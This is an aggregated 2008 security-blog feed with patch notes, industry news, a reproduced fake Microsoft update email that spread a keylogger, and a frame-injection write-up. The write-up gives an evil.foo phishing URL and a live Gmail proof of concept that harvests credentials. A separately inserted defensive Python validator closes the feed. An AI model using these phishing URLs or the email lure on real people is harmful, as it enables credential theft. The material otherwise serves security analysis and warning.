Sunday, October 12, 2008

Spliced feed for Security Bloggers Network


Cyber Attack Data-Sharing Is Lacking, Congress Told [Security Circus]

Posted: 12 Oct 2008 04:57 AM CDT

I already pointed this out in my 2007 Black Hat presentation, and this is exactly why the WOMBAT project was formed in the first place.

(Image) [Security Circus]

Posted: 12 Oct 2008 04:51 AM CDT


OSX Update 10.5.5 and Security Update 2008-006 [Random Thoughts from Joel's World]

Posted: 11 Oct 2008 04:22 PM CDT

Just hitting the streets, as we speak, Apple released OSX update 10.5.5. Built into 10.5.5 is Security Update 2008-006, marking the 6th major security update of the year. So aside from the ton of updates in 10.5.5 for OSX Leopard, check out the below updates included with it.

Keep in mind that the Security Update is not just for 10.5 (OSX Leopard); it is also available for 10.4, in both the Desktop and Server releases.

This update includes fixes for the following components:

  • ATS (Apple Type Services) -- CVE-2008-2305
  • BIND -- 10.5 updated to 9.4.2-P2; 10.4.11 updated to 9.3.5-P2
  • ClamAV (antivirus included with OSX Server) -- updated to version 0.93.3; CVE-2008-1100, CVE-2008-1387, CVE-2008-0314, CVE-2008-1833, CVE-2008-1835, CVE-2008-1836, CVE-2008-1837, CVE-2008-2713, CVE-2008-3215
  • Directory Services x2 -- CVE-2008-2329 (something I found interesting: the vulnerability was reported by the "IT Department of the West Seneca Central School District". Not your usual reporter. Very nice.)
  • Finder x2 -- CVE-2008-2331, CVE-2008-3613
  • ImageIO x4 -- CVE-2008-2327, CVE-2008-2332, CVE-2008-3608, CVE-2008-1382
  • Kernel -- CVE-2008-3609
  • libresolv -- CVE-2008-1447
  • Login Windows x2 -- CVE-2008-3610, CVE-2008-3611
  • mDNSResolver -- CVE-2008-1447
  • OpenSSH -- CVE-2008-1483, CVE-2008-1657
  • QuickDraw Manager -- CVE-2008-3614
  • Ruby -- CVE-2008-2376
  • SearchKit -- CVE-2008-3616
  • System Configuration -- CVE-2008-2312 (for 10.4.11 only)
  • System Preferences x2 -- CVE-2008-3617, CVE-2008-3618
  • Time Machine -- CVE-2008-3619
  • VideoConference -- CVE-2008-3621
  • Wiki Server -- CVE-2008-3622

So, all in all, quite a few updates here in this one.


"The intelligence of that creature known as a crowd is the square root of the ..." [Security Circus]

Posted: 11 Oct 2008 02:54 PM CDT

The intelligence of that creature known as a crowd is the square root of the number of people in it. –Terry Pratchett, Jingo
Reposted from thoschsoup via astrid

(Image) [Security Circus]

Posted: 11 Oct 2008 02:24 PM CDT


Reposted from derdritte


A Day in the Life of Conservative Joe [Security Circus]

Posted: 11 Oct 2008 02:22 PM CDT

RaiNews24 interviews a US military veteran who says in 1991 a small tactical nuclear bomb was used in Iraq [Security Circus]

Posted: 11 Oct 2008 02:07 PM CDT

"you are going to be embarrassed, ashamed, labeled as an idiot, shunned, ridic..." [Security Circus]

Posted: 11 Oct 2008 01:39 PM CDT

you are going to be embarrassed, ashamed, labeled as an idiot, shunned, ridiculed, and occasionally driven from the village with pitchforks. on average, YOU ARE GOING TO FAIL. MULTIPLE TIMES, in NEW & INTERESTING ways. GET USED TO IT. –Dave McClure: Fear is the Mind Killer of the Silicon Valley Entrepreneur
Reposted from c3o

(Image) [Security Circus]

Posted: 11 Oct 2008 01:39 PM CDT


Reposted from jessor via Sixtus


Ammanettato davanti a una scuola [Security Circus]

Posted: 11 Oct 2008 01:29 PM CDT

"The most extensive government report to date on whether terrorists can be ide..." [Security Circus]

Posted: 11 Oct 2008 12:04 PM CDT

The most extensive government report to date on whether terrorists can be identified through data mining has yielded an important conclusion: It doesn't really work. A National Research Council report, years in the making and scheduled to be released Tuesday, concludes that automated identification of terrorists through data mining or any other mechanism "is neither feasible as an objective nor desirable as a goal of technology development efforts." Inevitable false positives will result in "ordinary, law-abiding citizens and businesses" being incorrectly flagged as suspects. –Government report: Data mining doesn't work well

Microsoft's October Patch Release Advance Notice [Sunnet Beskerming Security Advisories]

Posted: 11 Oct 2008 08:26 AM CDT

Microsoft's Security Response Centre has provided advance notification of this month's expected Microsoft security patches.

After only a handful of patches were released with September's update, Microsoft are expecting to release 11 patches for October.

Of the 11 patches, four carry Microsoft's highest rating, Critical. These patches are expected for Windows, Host Integration Server, Office, and a cumulative Internet Explorer patch.

The six patches labelled as Important are all for Windows, while the Moderate patch will be for Office.

While it would be expected that all of the Critical patches are for remote code execution opportunities (and they are), some of the Important patches are also for remote code execution problems. Microsoft has done this in the past, and it suggests that the affected components are not present in a default Windows installation: some level of user modification or configuration away from the standard installation is required before a system is vulnerable.

Users of Microsoft Office on OS X should also expect to receive updates for some of the Office vulnerabilities.

In addition to the routine updates to the Malicious Software Removal Tool, and the high-priority, non-security updates, Microsoft will be introducing the Exploitability Index alongside this month's patches. The Index was announced at this year's Black Hat conference in Las Vegas. It will be interesting to watch whether the addition of the Index provides any extra benefit to users and administrators, or whether it merely identifies which vulnerabilities are more likely to be exploited if left unpatched.

Contributing Writer: Truth to Power [The Falcon's View]

Posted: 10 Oct 2008 06:24 PM CDT

As of this week, I'm an official core guide for "Practical Security" on a new collaboration site, Truth to Power (T2P). So, what is T2P? From their "About Us" section:"Truth to Power is about the control of information. It is...

Friday Summary, 10-10-2008 [securosis.com]

Posted: 10 Oct 2008 05:13 PM CDT

What a wild, wacky, crazy week. I have a funny suspicion a lot of stock brokers and investors are scraping together their spare change for some major liquid escapes this weekend. As a small business we haven’t felt the impact yet, but we are keeping a close eye on things and preparing to adjust our strategy as needed. Security deals are definitely slowing; we sense an impending rush of acquisitions, and a general feeling of nervousness. The need for security never goes away, but if you aren’t making plans to protect yourself through this crisis, *you* might go away. Someone responded to a Twitter post of mine that this will be over before the next president takes office; I can’t possibly imagine that happening.
Meanwhile, we watched the usual spectacle of the Presidential debate. Since I already know who I’m voting for, I’m not sure why I watch them at all. Like NASCAR, I suppose I don’t want to miss out when someone smashes into the wall and bursts into flames. On the security front, this week we saw more clickjacking details emerge, Apple release a security update, the World Bank get totally pwned, and Symantec make a major acquisition at a good multiple. But don’t get too excited; we also know a lot of investors pushing early exits at low multiples to save what they can. I don’t mean to focus so much on the finance side of the security world, but I think we’re going to see it bleed into our daily operations as the vendor landscape shifts around.
Over here at Securosis central I continued to geek out and work on our infrastructure. We may be small, but we’re trying to set up some cool collaboration tools to support us as we grow. For you other small business types, the wiki/blog/calendar/mail group integration of OS X Server works surprisingly well, although I don’t think it would be my first choice for an external web server. I just wish it would index documents attached to the wiki. I also ordered a Drobo for our backups and I’ll let you all know how it works.
Oh, and on my run yesterday I saw two coyotes in the park near our house watching me. Very cool.

Webcasts, Podcasts, and Conferences:

  • Martin and I have started broadcasting the Network Security Podcast live as we record it. In episode 123 (my luggage combination!) we talk about electronic voting, China spying, and clickjacking.
  • If you didn’t catch it in the October print edition of Macworld, here’s the online version of the firewall article I coauthored with Chris Pepper.
  • I wrote an article on mobile phone networks for TidBITS that made the front page of Slashdot. I think it’s about the 6th time I’ve hit the front page this year, which is pretty wacky. The TidBITS server had a massive failure unrelated to the Slashdot load right after the article was linked (oops).
  • I was quoted over at Dark Reading on the license changes to Metasploit 3.2. I know I wrote that quote, but reading it now it comes off strangely ambiguous. For the record, I think it’s a great change that will really drive some interesting things in the pen testing software world.
  • Adrian and I were invited by Jeremiah Grossman to a lunch event here in Phoenix with his company (WhiteHat Security) and F5. It was nice to finally get a demo of the F5/WhiteHat integration (WhiteHat generates dynamic WAF rules on the F5 box to block validated vulnerabilities; it’s pretty cool). Jeremiah also showed us his clickjacking code/demo. I almost wondered if I downplayed it too much after seeing it at work. On the bad side, some slimeballs from a local ISP decided to show up, enjoy a free lunch, and proceed to hit up every single one of us there as their personal sales prospects. I pretended I was out of business cards, but they snagged one of Adrian’s so he’ll get the call. Talk about low.

Favorite Securosis Posts:

  • Rich: Clickjacking Details, Analysis, and Advice. I tried to put some context around it, and talk about the overall impact. Direct from Rsnake is some advice on limiting the exploit.
  • Adrian: Symantec Buys MessageLabs. Symantec pays a hefty price, but they land a leader in SaaS email security and fill out their messaging security portfolio.

Favorite Outside Posts:

  • Adrian: I had trouble naming any single post my favorite for the week. There was a most shocking, a scariest, a most depressing and a most sadly illuminating. I am going with the illuminating look into the minds of Sequoia Capital and their reactions to the current financial crisis. This should look a lot like the tech crash of 2001, and frankly, I hope this information was conveyed to their portfolio companies 9-12 months ago as the window to react has passed.
  • Rich: Gunnar Peterson’s Innovators, Imitators, and Idiots. Just a great post that I need to blog about more fully later.

Top News:

Blog Comment of the Week:
Christophe’s comment on My “Policies, Plans, and Procedures” post:
Alas, I work in a former communist country where people were used to signing awful things, and hide whatever they did from upper eyes. I sure have an agreement, signed by all users, stating their responsibility, but that means almost nothing to them…

Time for happy hour with some of our local financial analyst friends. Smart guys who are doing well through this mess, so we plan on getting them loaded and sucking up the advice.
-Rich

Security Update for OS Microsoft Windows [mxlab - all about anti virus and anti spam]

Posted: 10 Oct 2008 01:17 PM CDT


MX Lab intercepted emails with the subject “Security Update for OS Microsoft Windows”. The email is rather long and instructs the recipient to run the attached file, named in this case KB934178.exe, which is a keylogger that can capture all user keystrokes. It is detected by Sophos as Mal/EncPk-CZ and by F-Secure as Trojan-Spy.Win32.Goldun.bce. The message even includes a PGP signature to make it look more realistic.

The author has done some basic homework. Steve Lipner is indeed working for Microsoft as Senior Director of Security Engineering Strategy in Trustworthy Computing (found it on the net; what a title, by the way) and has published the book The Security Development Lifecycle. You can also read blog articles from Steve Lipner, and other authors, at http://blogs.msdn.com/sdl/default.aspx.

Dear Microsoft Customer,

Please notice that Microsoft company has recently issued a Security Update for OS Microsoft Windows. The update applies to the following OS versions: Microsoft Windows 98, Microsoft Windows 2000, Microsoft Windows Millenium, Microsoft Windows XP, Microsoft Windows Vista.

Please notice, that present update applies to high-priority updates category. In order to help protect your computer against security threats and performance problems, we strongly recommend you to install this update.

Since public distribution of this Update through the official website http://www.microsoft.com would have result in efficient creation of a malicious software, we made a decision to issue an experimental private version of an update for all Microsoft Windows OS users.

As your computer is set to receive notifications when new updates are available, you have received this notice.

In order to start the update, please follow the step-by-step instruction:

1. Run the file, that you have received along with this message.
2. Carefully follow all the instructions you see on the screen.

If nothing changes after you have run the file, probably in the settings of your OS you have an indication to run all the updates at a background routine. In that case, at this point the upgrade of your OS will be finished.

We apologize for any inconvenience this back order may be causing you.

Thank you,
Steve Lipner
Director of Security Assurance
Microsoft Corp.

-----BEGIN PGP SIGNATURE-----

Version: PGP 7.1

-----END PGP SIGNATURE-----

Virus Total permalink and MD5: 1ffcb1ea024c228ade6d8dad681c6ed7.

As a general rule, Microsoft only distributes patches and security updates through Windows Update on your computer. Any other distribution channel, and email in particular, is not to be trusted at all.

Pwnage of World Bank [Donkey On A Waffle]

Posted: 10 Oct 2008 12:23 PM CDT

At a time when the financial crisis is taking the DOW below 8000 points and the world economy is starting to feel the repercussions, a high-profile security breach is being reported. The World Bank has been under siege for at least a year, and more information and details regarding the intrusions were published today by Fox News.

The first breach of the bank's secrets was discovered in September, 2007, after the FBI, while at work on a different cybercrime case, notified the bank that something was wrong. The feds pointed to a part of the bank's network that led out of the Johannesburg hub of the International Finance Corp. (IFC), a bank arm that lends to the private sector.

The second major breach, of the bank's treasury network in Washington, was discovered in April 2008. The World Bank's Treasury manages $70 billion in assets for 25 clients, including the central banks of some countries. It carries out substantial collaborations with the world's finance ministers on public wealth and debt management, runs an active bond-trading desk in Washington, and does everything from currency trading to capital markets financings.

What really makes this particular breach interesting (besides the target) is that at least one portion of the intrusion was allegedly sourced from one of the largest outsourcing firms in India. Why do the government and major financial institutions insist on the outsourcing model when it is readily apparent that the security of these organizations just isn't there? To really bring this home, how much of our software development have companies like Cisco, Microsoft, and even security vendors like Symantec outsourced to India? Obviously any is too much. If we really must continue to outsource overseas, there needs to be a requirement for independent security assessment of all outsourced development. *GASP*, who would have thunk it?

NOTE: Fixed broken link. Thanks Scott.

We don’t need NASL - OpenVAS [GNUCITIZEN]

Posted: 10 Oct 2008 11:35 AM CDT

For those of you who are new to these things, NASL stands for Nessus Attack Scripting Language. NASL is part of the closed-source Nessus vulnerability scanner and of its open-source fork, OpenVAS (Open Vulnerability Assessment System).

Beautiful Blue Beetle

Nessus plays a big part in the hearts of many administrators, security consultants and scanning vendors. Nessus was practically the first stable, well-maintained open-source security scanner, until they closed the source.

So, what about NASL? My point is that we don’t need it. Recently I had to work with OpenVAS and Nessus in order to automate some trivial penetration testing practices. I’ve worked with both and I got fed up with NASL. I still cannot understand why on earth we need yet another general-purpose scripting language which looks like some kind of hybrid between PHP, C and JavaScript.

Anyway, since version 3 Nessus has been closed source. Now we have OpenVAS, a fork of the 2.x Nessus. The project is coming along nicely but is still far from being good enough for environments where stability is a must. At some point I decided to contribute, since I am particularly interested in having a free Nessus clone with a good community behind it. As soon as I started putting down some code I realized that this is not what I want. Nessus’ code seems needlessly complicated.

In reality I need neither Nessus nor NASL. All I need are the tests. I believe that everybody feels the same. Perhaps the whole OpenVAS project should concentrate on writing the tests and let the user choose the engine. In my case Nessus was not a good engine due to license limitations. OpenVAS was not a good fit either, for stability reasons. I am stuck!

It occurred to me that because NASL is very close in syntax to PHP, JavaScript and C, it would actually be easy to rewrite the scripts in a more suitable language that has a better community around it. Of course everything needs to be done in an automatic fashion, because I highly doubt that anyone has the personal time to sit and rewrite boring NASL scripts unless he is paid good money for it. This is not how things work in the open-source world, though.

IMHO, the rewrite of these scripts can be achieved with some simple regex replacements. The testing engine can easily be composed of drag-and-drop JAR components, i.e. the whole thing would run on top of Java for portability reasons. I think this might turn into a much better framework, one which actually encourages people to contribute.

Unfortunately, I do not have the time to start such a project although I will most certainly contribute. I hope that someone is willing to take on the challenge. Any takers?


Kelvin Steele Made Me Do It [Vitalsecurity.org - A Revolution is the Solution]

Posted: 10 Oct 2008 11:34 AM CDT



Spammers: Encouraging us to kill our significant others since 2008.

Mail Goggles [securosis.com]

Posted: 09 Oct 2008 10:07 PM CDT

Someone at Google has created Mail Goggles. It’s a little Gmail utility to keep you from sending out email while, uh, under the influence. Jon Perlow, the author, had this to say …

[snip]

“Sometimes I send messages I shouldn’t send. Like the time I told that girl I had a crush on her over text message. Or the time I sent that late night e-mail to my ex-girlfriend that we should get back together,”

[/snip]

And who hasn’t, really? It’s no wonder I am not smart enough to work at Google. I would never have thought this up, never mind actually coding it. I checked, and it’s really there, under the Lab’s section, along with a dozen or so other productivity tools. I really think they could be onto something here … just consider this from a “Reputational Risk” perspective; this could be a hot product for Postini. One too many Martinis with lunch? Drowning your sorrows as you watch your stock portfolio plunge? A little testy that your “spa day” executive retreat was cancelled? No problem, Google will quarantine your outbound email! And if you’re too drunk to remember to turn this off, your email probably should be sequestered. Hoff was right, Google really is becoming a security company. Now, where did I leave that glass of bourbon …

-Adrian

The State of American Government and Politics [The Falcon's View]

Posted: 09 Oct 2008 09:09 PM CDT

If you've read this blog before, you know I'm a wee bit vexed by the current state of corruption and lunacy in the US Government. Here I offer a few more examples of just how scary-crazy things are getting. Illegal...

Frame Injection Fun [GNUCITIZEN]

Posted: 09 Oct 2008 07:01 PM CDT

Although some people might consider frame injection vulnerabilities the same as HTML injection/XSS, or a subset of them, they really are not the same.

Here is why:

  • There is no need to inject special control characters such as angle brackets (unlike HTMLi/XSS)
  • HTMLi/XSS filtering routines will not protect against frame injection, since the attacker only needs to insert a URL in the non-sanitized parameter

The best way to explain what I mean is to show an example. Most frame injection issues occur in web applications because the dynamic insertion of frameset/iframe targets is implemented without enough filtering. For instance, say that we have the following URL on the target site:

https://www.victim.foo/index.php?targeturl=/contact.php

A malicious user intending to launch a phishing attack will try tampering with the targeturl parameter. His goal is to have a third-party page under his control framed in place of the original contact page. Indeed, although index.php does not allow HTML or JavaScript to be assigned to targeturl, it is happy to process an absolute URL rather than a relative one:

https://www.victim.foo/index.php?targeturl=http://evil.foo/login.php

I thought that showing a live example would help our readers get an idea of what frame injection looks like in action. For that purpose, I prepared a rather inelegant proof of concept which takes advantage of the Google Images service. What’s neat is that although the legitimate URL would normally use the images.google.com domain, Google also allows us to use other google.com subdomains, such as mail.google.com, which is used by Gmail. This is ideal, as we’re trying to accomplish a frame injection attack which can be used to perform phishing attacks against Gmail users.

http://mail.google.com/imgres?imgurl=http://SecureGoogleMail&imgrefurl=%68%74%74%70%3a%2f%2f%73%6e%69%70%75%72%6c%2e%63%6f%6d/482f3

The previous PoC URL will cause the entered credentials to be submitted to www.gnucitizen.org when clicking on Sign in, so please do NOT submit any real credentials!

In short: the attacker has managed to display a non-legitimate third-party page while the legitimate domain (mail.google.com in this case) is shown in the address bar. The beauty of frame injection attacks is that the attacker is able to impersonate a trusted entity without needing to bypass XSS/HTMLi filters or even break into the target server.

Needless to say, in real-life the attacker would most likely automate the process of obtaining the harvested credentials by using a tool such as our x.php data-theft script.
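The fix on the application side is to canonicalise the frame target and refuse anything that resolves off-site, not to look for angle brackets. The following is an added example, not code from the GNUCITIZEN post: the vulnerable pass-through beside a hardened validator, exercised with the page's own /contact.php, http://evil.foo/login.php and the percent-encoded trick the Google PoC relies on; treating www.victim.foo as the only host that may be framed is an assumption.

```python
from typing import Optional
from urllib.parse import unquote, urljoin, urlsplit

# Assumed deployment values for the example: the application lives on the page's
# www.victim.foo and is only ever meant to frame pages from that host.
SITE_ORIGIN = "https://www.victim.foo"
ALLOWED_HOSTS = {"www.victim.foo"}
MAX_DECODE_ROUNDS = 3


def vulnerable_frame_src(targeturl: str) -> str:
    """The pattern the post describes: the parameter is dropped straight into the
    frameset, so an absolute URL such as http://evil.foo/login.php gets framed."""
    return targeturl


def hardened_frame_src(targeturl: str) -> Optional[str]:
    """Return an absolute, on-site frame src, or None when the value must be rejected."""
    # Canonicalise first. Decoding repeatedly (up to a fixed bound) is deliberately
    # conservative: a value that turns into an absolute URL at any decoding level is
    # refused, which covers the %68%74%74%70... style used in the Google PoC and the
    # double-encoded variant that a second decoding layer in the stack would expose.
    candidate = targeturl.strip()
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(candidate)
        if decoded == candidate:
            break
        candidate = decoded
    # Browsers treat a backslash like a forward slash, so /\evil.foo is //evil.foo.
    candidate = candidate.replace("\\", "/")
    # Control characters and embedded whitespace can split a scheme (java\nscript:).
    if any(ord(ch) < 0x21 for ch in candidate):
        return None
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative (//host) URL: only https to a listed host.
        if parts.scheme != "https" or parts.hostname not in ALLOWED_HOSTS:
            return None
        return candidate
    # Relative reference: resolve it against the site and re-check the resulting
    # host rather than trusting string prefixes.
    resolved = urljoin(SITE_ORIGIN + "/", candidate)
    if urlsplit(resolved).hostname not in ALLOWED_HOSTS:
        return None
    return resolved
```

The validator returns the resolved absolute URL, so the frameset should embed that return value rather than the raw parameter.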

